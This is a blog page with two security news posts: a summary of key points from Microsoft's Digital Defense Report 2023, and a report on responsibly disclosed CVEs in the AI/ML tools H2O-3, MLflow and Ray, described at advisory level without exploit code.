Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label AI/ML vulnerabilities. Show all posts

Microsoft's Cybersecurity Report 2023

Microsoft recently issued its Digital Defense Report 2023, which offers important insights into the state of cyber threats today and suggests ways to improve defenses against digital attacks. These five key insights illuminate the opportunities and difficulties in the field of cybersecurity and are drawn from the report.

  • Ransomware Emerges as a Pervasive Threat: The report highlights the escalating menace of ransomware attacks, which have become more sophisticated and targeted. The prevalence of these attacks underscores the importance of robust cybersecurity measures. As Microsoft notes, "Defending against ransomware requires a multi-layered approach that includes advanced threat protection, regular data backups, and user education."
  • Supply Chain Vulnerabilities Demand Attention: The digital defense landscape is interconnected, and supply chain vulnerabilities pose a significant risk. The report emphasizes the need for organizations to scrutinize their supply chains for potential weaknesses. Microsoft advises, "Organizations should conduct thorough risk assessments of their supply chains and implement measures such as secure coding practices and software integrity verification."
  • Zero Trust Architecture Gains Prominence: Zero Trust, a security framework that assumes no trust, even within an organization's network, is gaining momentum. The report encourages the adoption of Zero Trust Architecture to bolster defenses against evolving cyber threats. "Implementing Zero Trust principles helps organizations build a more resilient security posture by continuously verifying the identity and security posture of devices, users, and applications," Microsoft suggests
  • AI and Machine Learning Enhance Threat Detection: Leveraging artificial intelligence (AI) and machine learning (ML) is crucial in the fight against cyber threats. The report underscores the effectiveness of these technologies in identifying and mitigating potential risks. Microsoft recommends organizations "leverage AI and ML capabilities to enhance threat detection, response, and recovery efforts."
  • Employee Training as a Cybersecurity Imperative: Human error remains a significant factor in cyber incidents. The report stresses the importance of continuous employee training to bolster the human element of cybersecurity. Microsoft asserts, "Investing in comprehensive cybersecurity awareness programs can empower employees to recognize and respond effectively to potential threats."

Microsoft says, "A resilient cybersecurity strategy is not a destination but a journey that requires continuous adaptation and improvement."An ideal place to start for a firm looking to improve its cybersecurity posture is the Microsoft Digital Defense Report 2023. It is necessary to stay up to date on the current threats to digital assets and take precautionary measures to secure them.






AI/ML Tools Uncovered with 12+ Vulnerabilities Open to Exploitation

 

Since August 2023, individuals on the Huntr bug bounty platform dedicated to artificial intelligence (AI) and machine learning (ML) have exposed more than a dozen vulnerabilities that jeopardize AI/ML models, leading to potential system takeovers and theft of sensitive information.

Discovered in widely used tools, including H2O-3, MLflow, and Ray, each boasting hundreds of thousands or even millions of monthly downloads, these vulnerabilities have broader implications for the entire AI/ML supply chain, according to Protect AI, the entity overseeing Huntr.

H2O-3, a low-code machine learning platform facilitating the creation and deployment of ML models through a user-friendly web interface, has been revealed to have default network exposure without authentication. This flaw allows attackers to provide malicious Java objects, executed by H2O-3, providing unauthorized access to the operating system.

One significant vulnerability identified in H2O-3, labeled as CVE-2023-6016 with a CVSS score of 10, enables remote code execution (RCE), allowing attackers to seize control of the server and pilfer models, credentials, and other data. Bug hunters also pinpointed a local file include flaw (CVE-2023-6038), a cross-site scripting (XSS) bug (CVE-2023-6013), and a high-severity S3 bucket takeover vulnerability (CVE-2023-6017).

Moving on to MLflow, an open-source platform managing the entire ML lifecycle, it was disclosed that it lacks default authentication. Researchers identified four critical vulnerabilities, with the most severe being arbitrary file write and patch traversal bugs (CVE-2023-6018 and CVE-2023-6015, CVSS score of 10). These bugs empower unauthenticated attackers to overwrite files on the operating system and achieve RCE. Additionally, critical-severity arbitrary file inclusion (CVE-2023-1177) and authentication bypass (CVE-2023-6014) vulnerabilities were discovered.

The Ray project, an open-source framework for distributed ML model training, shares a similar default authentication vulnerability. A crucial code injection flaw in Ray's cpu_profile format parameter (CVE-2023-6019, CVSS score of 10) could result in a complete system compromise. The parameter lacked validation before being inserted into a system command executed in a shell. Bug hunters also identified two critical local file include issues (CVE-2023-6020 and CVE-2023-6021), enabling remote attackers to read any files on the Ray system.

All these vulnerabilities were responsibly reported to the respective vendors at least 45 days before public disclosure. Users are strongly advised to update their installations to the latest non-vulnerable versions and restrict access to applications lacking available patches.